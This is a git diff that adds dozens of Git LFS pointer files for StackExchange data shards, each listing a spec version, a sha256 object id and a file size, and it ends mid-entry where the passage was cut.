0000000000000000000000000000000000000000..5db8acbf59b38f02370b8028dff75eb0df5f4671 --- /dev/null +++ b/data/stackexchange/1-1/634_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:68b96defebdedca7b31fc730b142d7f874ffca2cb9b62f450d8bd52ff6e33000 +size 41274572 diff --git a/data/stackexchange/1-1/635_2289.jsonl b/data/stackexchange/1-1/635_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..222364d9faafb3f0acea021ae945214e3fca9f32 --- /dev/null +++ b/data/stackexchange/1-1/635_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a99f7dbd08e539d975adb050f3618b1f4d5c5aec967ce1239d7e685ec4dadd1a +size 41582658 diff --git a/data/stackexchange/1-1/636_2289.jsonl b/data/stackexchange/1-1/636_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c95c6e432f159edddbc72d1924b62720aa9ada02 --- /dev/null +++ b/data/stackexchange/1-1/636_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ee06c0955142a29da0259951e55b0667ef877c2f76e307e46a36945bdd67bf51 +size 41420319 diff --git a/data/stackexchange/1-1/637_2289.jsonl b/data/stackexchange/1-1/637_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3145edf33a9bb042d8af3f175b07b3f189d50c0f --- /dev/null +++ b/data/stackexchange/1-1/637_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b8704f83ac0d68c96e8e412d528e588f2f006c1425b90b740212bad2367b1f56 +size 42287611 diff --git a/data/stackexchange/1-1/638_2289.jsonl b/data/stackexchange/1-1/638_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e2b2af8216b1fa48c57c0feb62b0c2307372f753 --- /dev/null +++ b/data/stackexchange/1-1/638_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:5ac6f872eea973ad4ace747cb51dc267180d026257ca65f817a756b45af2dc0c +size 41332995 diff --git a/data/stackexchange/1-1/639_2289.jsonl b/data/stackexchange/1-1/639_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..67de6980734fba3f692dac9f833f34517959e9f3 --- /dev/null +++ b/data/stackexchange/1-1/639_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a8e56376b298291c2c584e4b69257a1192467a4a42438f580280cbf0e26fa616 +size 41352437 diff --git a/data/stackexchange/1-1/63_2289.jsonl b/data/stackexchange/1-1/63_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2fd7fa38f2e7fa7b09ed67c4b6a7e7fb8453cbe3 --- /dev/null +++ b/data/stackexchange/1-1/63_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cada69dabb3c09830358dacd14e41faf3193718dca8896c3113330dcb69ecc33 +size 39456935 diff --git a/data/stackexchange/1-1/640_2289.jsonl b/data/stackexchange/1-1/640_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d74d5fa29c2962cbe299cbe1342b4832e1ab781b --- /dev/null +++ b/data/stackexchange/1-1/640_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5ef3880743edfee3b332a710f47bed4c48f2b6a18d677cc71ab0195931a7724f +size 40936692 diff --git a/data/stackexchange/1-1/641_2289.jsonl b/data/stackexchange/1-1/641_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c519e0f36a69645cca2840fbf0940a8899109ff7 --- /dev/null +++ b/data/stackexchange/1-1/641_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ced110875352fb84e8cc223694fcf5286071e1bbb958ad2f1ccea9de9e1bb3af +size 41381810 diff --git a/data/stackexchange/1-1/642_2289.jsonl b/data/stackexchange/1-1/642_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..96e875b6fa8d86935e3084feec8796b5d08956c9 --- /dev/null +++ b/data/stackexchange/1-1/642_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7825936735c1317ccdbd07373a6c8735c9d85c7b244280ee29beb288f03b79d6 +size 40943723 diff --git a/data/stackexchange/1-1/643_2289.jsonl b/data/stackexchange/1-1/643_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fd0a54edaa7a65862359d42b7e0b4a54be6eb41b --- /dev/null +++ b/data/stackexchange/1-1/643_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:336e27be9f5f5cbd98da3f587e30b7094b0ad55deec296037822ff0c53ffb6a2 +size 42115604 diff --git a/data/stackexchange/1-1/644_2289.jsonl b/data/stackexchange/1-1/644_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4d1ecc685a96106b08a4b75e8eae6deb84f04f8c --- /dev/null +++ b/data/stackexchange/1-1/644_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7eb8d5b37863026240c5da640beb3119cfe1b4880ff68a7d4b8b924fa962ceb4 +size 41914857 diff --git a/data/stackexchange/1-1/645_2289.jsonl b/data/stackexchange/1-1/645_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..988dee9a190528fb4165f0ebb453491c8eb15485 --- /dev/null +++ b/data/stackexchange/1-1/645_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:65197b4d30f2aac636ceb6e0614a8f947431414c62936f7deaf67b8f5e418fde +size 41554682 diff --git a/data/stackexchange/1-1/646_2289.jsonl b/data/stackexchange/1-1/646_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..e8db43fde25986eb3f09ba6647ccce3588089d75 --- /dev/null +++ b/data/stackexchange/1-1/646_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:20c4456ddc925f12e1e189b209f77263824a2f27672cd720e010062f62f0168b +size 42052550 diff --git a/data/stackexchange/1-1/647_2289.jsonl b/data/stackexchange/1-1/647_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d2b7c1556d111a3c995ae0c2e0b3aac8ef6ac1ed --- /dev/null +++ b/data/stackexchange/1-1/647_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:20d74b9b6af842758dd661c76e7840b9d7dbf2380f75a9ee721c5dc23a8b945a +size 41849920 diff --git a/data/stackexchange/1-1/648_2289.jsonl b/data/stackexchange/1-1/648_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c0fb78fdfc0c21c9d369828d203312cc0adcc0cb --- /dev/null +++ b/data/stackexchange/1-1/648_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3698c582b64671986ecef6e14a851f4d41550f133f8930c0f234a341273f44f7 +size 41192608 diff --git a/data/stackexchange/1-1/649_2289.jsonl b/data/stackexchange/1-1/649_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..51f1983b5d520bf8a4f4b9af79b07b5bb822de4c --- /dev/null +++ b/data/stackexchange/1-1/649_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:272675af96dc700499ebe2f0e5374a2a4ac96c1216f5e80c8cc4461351953edd +size 41486201 diff --git a/data/stackexchange/1-1/64_2289.jsonl b/data/stackexchange/1-1/64_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..37bbc306b4b6d19a4a25f1851353ef0b41e31f01 --- /dev/null +++ b/data/stackexchange/1-1/64_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b5c9daa1d51e1d09542f7e00c3ef1527882ae8fb4567067b2b7d430c0e42b7d2 +size 39086328 diff --git a/data/stackexchange/1-1/650_2289.jsonl b/data/stackexchange/1-1/650_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cbb1a6b13cb72409fff171406c1ef3dbec7cbae9 --- /dev/null +++ b/data/stackexchange/1-1/650_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f13c6c00a412cbcbdd30a1ef98d5dd8f57ee10d85553ce6b38b72c810b3403f9 +size 37220956 diff --git a/data/stackexchange/1-1/651_2289.jsonl b/data/stackexchange/1-1/651_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2b0d3e704d4ecd99afdc274e0eba3a2c11dda5a4 --- /dev/null +++ b/data/stackexchange/1-1/651_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:72addbbf5f8035683cd1ea9d583420cd89b4a8377746f4de038dabac35f8e5cc +size 37669969 diff --git a/data/stackexchange/1-1/652_2289.jsonl b/data/stackexchange/1-1/652_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4fee56a00e62a66e9a79c02624d3e83e21740286 --- /dev/null +++ b/data/stackexchange/1-1/652_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5477a3c5a68adcc0b8c4a35bf6cee8811b08345b6a761bb4080dcbc8ed3a64d8 +size 37067170 diff --git a/data/stackexchange/1-1/653_2289.jsonl b/data/stackexchange/1-1/653_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fb1967fe4a7195a66a4c13092f65370d50dcc3a2 --- /dev/null +++ b/data/stackexchange/1-1/653_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:2883c10000658efb992728a0743da91e8dd6b129938892e0b7769e3cc7759918 +size 37248603 diff --git a/data/stackexchange/1-1/654_2289.jsonl b/data/stackexchange/1-1/654_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e3b7c6d4a60e06c55f7917543c0f9c56918566ef --- /dev/null +++ b/data/stackexchange/1-1/654_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c9b9e1ed5931e82d171fe89410add7d8d276a6f9b439598bda48ad7f371bccc2 +size 36956061 diff --git a/data/stackexchange/1-1/655_2289.jsonl b/data/stackexchange/1-1/655_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..14db732eab950b4d54a0913e9cfb2f518d9ee777 --- /dev/null +++ b/data/stackexchange/1-1/655_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7f3815ad0038047772d7b6ab655c31770cbe5b74ad89d2b0f78c446b94d1e243 +size 37059674 diff --git a/data/stackexchange/1-1/656_2289.jsonl b/data/stackexchange/1-1/656_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c3cbfeace37f8e1f039f6b6a121d0be87046dc84 --- /dev/null +++ b/data/stackexchange/1-1/656_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:df696ca72acefe4a1d58f3a5d0b427381bf2a57fb4f677970c9ba57bfe978d3c +size 36939863 diff --git a/data/stackexchange/1-1/657_2289.jsonl b/data/stackexchange/1-1/657_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..99b6de704cf7be8f609d9ad5fb3e47596b79c7f9 --- /dev/null +++ b/data/stackexchange/1-1/657_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1c604b87aeee1b679d9fda3d62a64450d6731fa4e82da868fae9a2b9f3f1f743 +size 36198442 diff --git a/data/stackexchange/1-1/658_2289.jsonl b/data/stackexchange/1-1/658_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6d33bdf01416371e7f005481e36700fbc9d315a4 --- /dev/null +++ b/data/stackexchange/1-1/658_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:583e22165349e6ac1f20eddcc32d8ceaa7dca46838169e74e4dc082e6c19dcc4 +size 37248174 diff --git a/data/stackexchange/1-1/659_2289.jsonl b/data/stackexchange/1-1/659_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bf7e38637bb47fa94090458e0ce5bfad4a81555b --- /dev/null +++ b/data/stackexchange/1-1/659_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f7caacae9e7a8c4deff87942b8ec5a937becf73d3b944bde578a9ca41697c484 +size 37896071 diff --git a/data/stackexchange/1-1/65_2289.jsonl b/data/stackexchange/1-1/65_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..814909f330be1223ec7f8ded37f3694da8b6e9b8 --- /dev/null +++ b/data/stackexchange/1-1/65_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a3d4235de8ac19db83e4b3d77de25eaf7b7dbe88692eec6ee73301950e9d7a69 +size 39423865 diff --git a/data/stackexchange/1-1/660_2289.jsonl b/data/stackexchange/1-1/660_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2299f47fd4905c7aeaa032bdb09c739a9ab7b095 --- /dev/null +++ b/data/stackexchange/1-1/660_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:48cbe73dac26c24dfaf03aa8c1c0e7e017a1c85dd6a9b63482387a036beb44ff +size 37104476 diff --git a/data/stackexchange/1-1/661_2289.jsonl b/data/stackexchange/1-1/661_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..fff0598226b7278191ca90f1d8b0c8d657690848 --- /dev/null +++ b/data/stackexchange/1-1/661_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5d4bce8fb6c452b36dc7804176e34931111b513a31ba7997135e417e8c34e278 +size 36521666 diff --git a/data/stackexchange/1-1/662_2289.jsonl b/data/stackexchange/1-1/662_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..383564d0feff00c6c77f9d14b8ef65a6f8e3f3f3 --- /dev/null +++ b/data/stackexchange/1-1/662_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6cb3e38247d2ae0acc18b1139dbdfdce40283fe5df33ec0e73d7df166cf52ba4 +size 36584323 diff --git a/data/stackexchange/1-1/663_2289.jsonl b/data/stackexchange/1-1/663_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..226e68ceace0c71b58075ebe385d44a769627904 --- /dev/null +++ b/data/stackexchange/1-1/663_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f4c1d69de376ef64abc66320f8f37ae08260ff12363e46a6459c9b1c3198df02 +size 37259860 diff --git a/data/stackexchange/1-1/664_2289.jsonl b/data/stackexchange/1-1/664_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9768f303f5951f3e63fd0f0597ed2918d63320ba --- /dev/null +++ b/data/stackexchange/1-1/664_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4f9ee815a32b9146a53229df049c52d4f990961e8e11638e8a035e6f75ff5469 +size 37527044 diff --git a/data/stackexchange/1-1/665_2289.jsonl b/data/stackexchange/1-1/665_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0616a42c6d24a9fe0e684c91e81863aae5dabf26 --- /dev/null +++ b/data/stackexchange/1-1/665_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c111407a01fb02f0b2fd80bc7e8d4dbba906918a3394597ac2862a2a4e9f1cb1 +size 37089366 diff --git a/data/stackexchange/1-1/666_2289.jsonl b/data/stackexchange/1-1/666_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..16806e8b436ceff77cabcfef157bb7af4041572a --- /dev/null +++ b/data/stackexchange/1-1/666_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dcaa9db6b903658da75869e2e62628bf14f65dd04fbcddb11355c1c6a6cf7cf4 +size 36831710 diff --git a/data/stackexchange/1-1/667_2289.jsonl b/data/stackexchange/1-1/667_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..58cc2cb49ad640068466c83c57461c8d97c0bb5b --- /dev/null +++ b/data/stackexchange/1-1/667_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c7e23a3814a6cffa90528b3a654fc3acefb42521d0753c872fc3c0572cf6f656 +size 37618180 diff --git a/data/stackexchange/1-1/668_2289.jsonl b/data/stackexchange/1-1/668_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b0f33842634d01864b81e54230b2194ca61b4a06 --- /dev/null +++ b/data/stackexchange/1-1/668_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6e8a70ae578b2231a145781ad4f43206a596c4de6e0af56974613f832ce4e5f5 +size 36573808 diff --git a/data/stackexchange/1-1/669_2289.jsonl b/data/stackexchange/1-1/669_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8c9ef9b1ea12f52f8aaa39dce458c41a9ab180cb --- /dev/null +++ b/data/stackexchange/1-1/669_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:f1e3138ec29494177a497ef6d8956ecc4e228f227fa57f487b1857a5a7c8a416 +size 36756721 diff --git a/data/stackexchange/1-1/66_2289.jsonl b/data/stackexchange/1-1/66_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..88151ac46d54db9d51909a7f0d4b8e05c1a54b2b --- /dev/null +++ b/data/stackexchange/1-1/66_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ebf62e5637a407b3f6abcf261d4770047419f68acffe9e41c6da3530db98b7ad +size 39925908 diff --git a/data/stackexchange/1-1/670_2289.jsonl b/data/stackexchange/1-1/670_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f3afad40d1940d3567ed4f98831c758accdcb6da --- /dev/null +++ b/data/stackexchange/1-1/670_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3009f6e3929b198bbdace6991ffd262b10752346ff73f52f61a3b0ac1ff69972 +size 37511816 diff --git a/data/stackexchange/1-1/671_2289.jsonl b/data/stackexchange/1-1/671_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c32443c80252676031e0aa5912d60ce67dc9d4b0 --- /dev/null +++ b/data/stackexchange/1-1/671_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4d4c6bf2ac684b7818bb5c454067a9379f949274f540fd5727db411c3d75881d +size 37065196 diff --git a/data/stackexchange/1-1/672_2289.jsonl b/data/stackexchange/1-1/672_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1ccdd2a3f043dd117b763dc7a21f07dfd01ed62e --- /dev/null +++ b/data/stackexchange/1-1/672_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a7d32b3a64c892fa22742d5a9b8b72cc187ca0c67e8b6587731cad1e033323d5 +size 36890496 diff --git a/data/stackexchange/1-1/673_2289.jsonl b/data/stackexchange/1-1/673_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2f0be91790cba23dc85897e6a67dabd745cd56a6 --- /dev/null +++ b/data/stackexchange/1-1/673_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a4313f74f4f4c77820e50b8448705efb942663dcd1fb502f44f6dbefbf1b49a7 +size 37599886 diff --git a/data/stackexchange/1-1/674_2289.jsonl b/data/stackexchange/1-1/674_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..abf6f5885649201d402d64cf14543743e9f935fe --- /dev/null +++ b/data/stackexchange/1-1/674_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2db240b5f91808429185bbd5220506fdde29e309ee7802fa84b8aca902375824 +size 37438651 diff --git a/data/stackexchange/1-1/675_2289.jsonl b/data/stackexchange/1-1/675_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..352e1d2b9633f1e73a27500f21662f93d0b6ef14 --- /dev/null +++ b/data/stackexchange/1-1/675_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:31cfeb75d3aa4deeca9208af833fd75eb99e62f1741b031efc4d498b8c989834 +size 37073664 diff --git a/data/stackexchange/1-1/676_2289.jsonl b/data/stackexchange/1-1/676_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cdc8161ac579a83760c086fc3100f9db0f493afc --- /dev/null +++ b/data/stackexchange/1-1/676_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1784955c447c64aaede9bd4aa798fee4524c8acc98f7ef98ab387c5a1608e298 +size 37016942 diff --git a/data/stackexchange/1-1/677_2289.jsonl b/data/stackexchange/1-1/677_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..d8caefb340bb800c442163011793f72ae18c47ac --- /dev/null +++ b/data/stackexchange/1-1/677_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8e09b567bc34419b50b4bf8a18864cba0250eada400b5d7fc45cecd65629ab8c +size 37587011 diff --git a/data/stackexchange/1-1/678_2289.jsonl b/data/stackexchange/1-1/678_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a0ab69be7f07c9f5743782de60d113a2bf9bb979 --- /dev/null +++ b/data/stackexchange/1-1/678_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d676a8a00555d58b468e7a31c503e3070c0431e31a0ed79131e8c54b35add69f +size 37159815 diff --git a/data/stackexchange/1-1/679_2289.jsonl b/data/stackexchange/1-1/679_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8d41b0eba859d225cedadbb93dbacf0bace9e96f --- /dev/null +++ b/data/stackexchange/1-1/679_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c77bf06fe6a54da493d9606bf081cbf238e45820be2fe95a915fc7d4b0814b28 +size 37112994 diff --git a/data/stackexchange/1-1/67_2289.jsonl b/data/stackexchange/1-1/67_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..05013f8a00444658d75db1fabe377c949d356a27 --- /dev/null +++ b/data/stackexchange/1-1/67_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:205946040e4d4f7def129f2da0978528ba2882d18c517c743fc71bffa441cdf6 +size 39662372 diff --git a/data/stackexchange/1-1/680_2289.jsonl b/data/stackexchange/1-1/680_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..63d4f5493cb7b46919c57873b2580d2b8fa17bb8 --- /dev/null +++ b/data/stackexchange/1-1/680_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f070f9e9051de29ed7ca2bcaedeaeb848a58445521910b1a2322062dc5c0a6a6 +size 37536444 diff --git a/data/stackexchange/1-1/681_2289.jsonl b/data/stackexchange/1-1/681_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..32478ca876bdfd6f024692a1e2c51ca32c82d17a --- /dev/null +++ b/data/stackexchange/1-1/681_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bb30c7bef34abe456b2a6fa06504bad1dd1e0e622d73481e40ed333d0bebb061 +size 37184450 diff --git a/data/stackexchange/1-1/682_2289.jsonl b/data/stackexchange/1-1/682_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fb71e06e2b80dc10517788dea4069b4e539f3f59 --- /dev/null +++ b/data/stackexchange/1-1/682_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1ed63570b2da78b4e6e098f5c365d8b2a926746c99bc4a43f18bc9b370fd3a8b +size 36718120 diff --git a/data/stackexchange/1-1/683_2289.jsonl b/data/stackexchange/1-1/683_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2edb3f516d43ae012971786eb20f072a4a6671b1 --- /dev/null +++ b/data/stackexchange/1-1/683_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0322c58dae83cd98136107df249b4ce28fe6b267b56b52965998f0d7a8f80324 +size 36626167 diff --git a/data/stackexchange/1-1/684_2289.jsonl b/data/stackexchange/1-1/684_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..67887d540c4cd6fc92bd3f3fbf20ebb954a49b70 --- /dev/null +++ b/data/stackexchange/1-1/684_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:603fd37b388738fa9fa7632d4faef13d7b1eb2937ba8e727f164a13579de758a +size 37143454 diff --git a/data/stackexchange/1-1/685_2289.jsonl b/data/stackexchange/1-1/685_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d51cf4c3dbf10782ced6c1b9f8db1852afce7f2b --- /dev/null +++ b/data/stackexchange/1-1/685_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:228c6406b3715180fdb92f06f239099f81718b3958f823bb17be18e1dce2cd4d +size 37817472 diff --git a/data/stackexchange/1-1/686_2289.jsonl b/data/stackexchange/1-1/686_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..64dea318dafa5e55652c6f038aa68cf231c7002c --- /dev/null +++ b/data/stackexchange/1-1/686_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fbb5f50386e0a8f54b5eb2cd0aac2b3968fdd6edc234ff1016d483fb7fd7ff45 +size 36796135 diff --git a/data/stackexchange/1-1/687_2289.jsonl b/data/stackexchange/1-1/687_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9a9c1f133efbcd169c503c6d3c9ff57062933420 --- /dev/null +++ b/data/stackexchange/1-1/687_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:98d61db479b6dbf6a72f40dea2f56751055f99865f71bae89305ae83df708d60 +size 37299997 diff --git a/data/stackexchange/1-1/688_2289.jsonl b/data/stackexchange/1-1/688_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4ac2566e9abbb5978caca76ce79aa38023d92e88 --- /dev/null +++ b/data/stackexchange/1-1/688_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0f5cfbd68838291411fe1376d86f07c57b68e184a76e19364c4131e383f21149 +size 37024144 diff --git a/data/stackexchange/1-1/689_2289.jsonl b/data/stackexchange/1-1/689_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b3a2fa9c0a7f21a70821d9fcffaa0c5e774464d1 --- /dev/null +++ b/data/stackexchange/1-1/689_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e0cad5dfd51080c893db9cc150578e65fcc91dc387d372beb3097168aba4a122 +size 36858928 diff --git a/data/stackexchange/1-1/68_2289.jsonl b/data/stackexchange/1-1/68_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..04b4dba2bd6c53b42d0d2e81eb484d0573c26982 --- /dev/null +++ b/data/stackexchange/1-1/68_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b08aca7596cd8c1af373cf8fe5df36d8b37e79841016f7c8ac47940f5a9ce39c +size 39290320 diff --git a/data/stackexchange/1-1/690_2289.jsonl b/data/stackexchange/1-1/690_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b25cccb9f02ce1946ee5d909106fdd4fd5a73a3b --- /dev/null +++ b/data/stackexchange/1-1/690_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fc45b4f08d94690884e87d40ca6332e52f309fdd91aba0d6b120d0928abd6d7c +size 36941622 diff --git a/data/stackexchange/1-1/691_2289.jsonl b/data/stackexchange/1-1/691_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f40a43c186137f7e45a50bdc6920f125206a345f --- /dev/null +++ b/data/stackexchange/1-1/691_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:830c2a089524f5ec1108660274e219aa05c787228f7b4859ee103273b1de897b +size 37295970 diff --git a/data/stackexchange/1-1/692_2289.jsonl b/data/stackexchange/1-1/692_2289.jsonl new file mode 100644 index 
